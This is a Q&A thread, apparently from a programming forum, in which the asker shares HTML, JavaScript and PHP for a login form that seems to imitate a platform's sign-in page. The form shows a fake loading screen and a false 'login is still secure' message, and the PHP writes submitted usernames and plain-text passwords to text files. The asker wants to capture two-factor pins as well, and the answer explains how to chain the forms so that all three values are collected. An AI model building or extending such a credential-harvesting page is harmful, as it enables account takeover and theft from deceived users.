# How to write more than one form to a file at once

Tags: javascript, php, html

Currently I have two forms, one for usernames and passwords and one for a special authentication pin.

Usernames and passwords

```
<form action="#" method="POST" id="hello" onsubmit="return false;">
<div id="loadingGif" style="display:none"><img src="#"></div> 

<input class="btn_green_white_innerfade btn_medium" type="submit" 
name="submit" id="userLogin" value="Sign in" width="104" height="25" 
border="0" tabindex="5" onclick="showDiv()">
            <div class="mainLoginLeftPanel_signin">
                <label for="userAccountName">username</label><br>
                <input class="textField" type="text" name="username" 
id="userAccountName" maxlength="64" tabindex="1" value=""><br>&nbsp;<br>
                <label for="userPassword">Password</label><br>
                <input class="textField" type="password" name="password" 
id="userPassword" autocomplete="off" maxlength="64" tabindex="2"><br>
                <div id="passwordclearlabel" style="text-align: left; 
display: none;">It seems that you may be having trouble entering your 
password. We will now show your password in plain text (login is still 
secure).</div>
</div>
```

By adding /loginaction.php into the action="", I was able to use PHP to write the user name and password inputs to a text file, however now I want to do the same with the special two factor pin, adding the file into action="", refreshes the page before the div shows up which allows the user to enter in there pin, I need help finding a way to write all three inputs into this text file, any help will be appreciated, very new to this

the function to show the div where the code is inputted is here

```
function showDiv() {
    document.getElementById('userLogin').style.display = "none";
    document.getElementById('loadingGif').style.display = "block";
    setTimeout(function() {
        document.getElementById('loadingGif').style.display = "none";
        document.getElementById('showme').style.display = "block";
    },2000);
}
```

the PHP code that writes the file is

```
<?php
$myfile = fopen("newfile_" . uniqid() . ".txt", "w") or die("File written");
$txt = $_POST['username'] . ':' . $_POST['password'];
fwrite($myfile, $txt);
fclose($myfile);
echo "LOREM IPSUM:("; 
?>
```

Comment: This would be easier in a DB and more secure. Also don't store plain text passwords.

Comment: it's currently only for personal use

Comment: Well by the `currently` there I assume you are planning to use it elsewhere at some point. Might as well learn the correct way first.

Answer (score 0):

You're a little unclear with what you're asking. It seems that you're asking, how do I use one form to create a username and password then redirect them to another page, have them make a pin then write all three of those inputs to a specific text file?

Ignoring the fact that you could do these two things on one page instead of what you're doing, you just POST your relevant information to the next page in the chain.

Username & password form -> POSTS TO -> Pin Code form -> POSTS TO -> processing form where all three bits of information are processed into the afforementioned text file.

You just forward the information from the username and password form as a hidden input in the pin code form.